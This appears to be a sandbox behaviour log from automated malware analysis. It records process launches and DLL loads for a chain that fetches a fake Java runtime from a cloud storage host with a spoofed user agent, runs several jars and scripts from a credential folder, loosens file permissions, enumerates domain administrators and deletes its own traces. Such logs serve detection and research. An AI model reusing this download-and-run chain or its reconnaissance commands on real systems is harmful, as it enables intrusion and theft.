Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1584,i,9657057088581335983,7569918057650500138,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\wget.exe "wget.exe" --user-agent="BlackBerry" -O "jre-1.8.zip" "https://seasonmonster.s3.us-east-1.amazonaws.com/jre-1.8.zip"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe "unzip.exe" "jre-1.8.zip" -d "jre"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe "jre\jre-1.8\bin\javaw.exe" -jar "jre\jre-1.8\lib\deploy\recovery.jar"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe "jre\jre-1.8\bin\javaw.exe" -jar "jre\jre-1.8\lib\deploy\history.jar"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe "jre\jre-1.8\bin\javaw.exe" -jar "jre\jre-1.8\lib\deploy\checker.jar"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript //nologo "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runResJar.vbs"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript //nologo "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runEmailJs.vbs"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript //nologo "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runDeleteHTA.vbs"
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic computersystem get domain
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\whoami.exe whoami /groups
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\whoami.exe whoami /groups
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\net.exe net group "Domain Admins" /domain
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\res.jar"
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\email.js"
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\deleteHTAandSelf.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5 /nobreak

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\wget.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\wget.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\wget.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\wget.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\wget.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\wget.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\wget.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\wget.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\wget.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\wget.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\wget.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\wget.exe	Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\whoami.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\whoami.exe	Section loaded: authz.dll
Source: C:\Windows\SysWOW64\whoami.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\whoami.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\whoami.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\whoami.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\whoami.exe	Section loaded: authz.dll
Source: C:\Windows\SysWOW64\whoami.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\whoami.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\whoami.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: kernel.appcore.dll
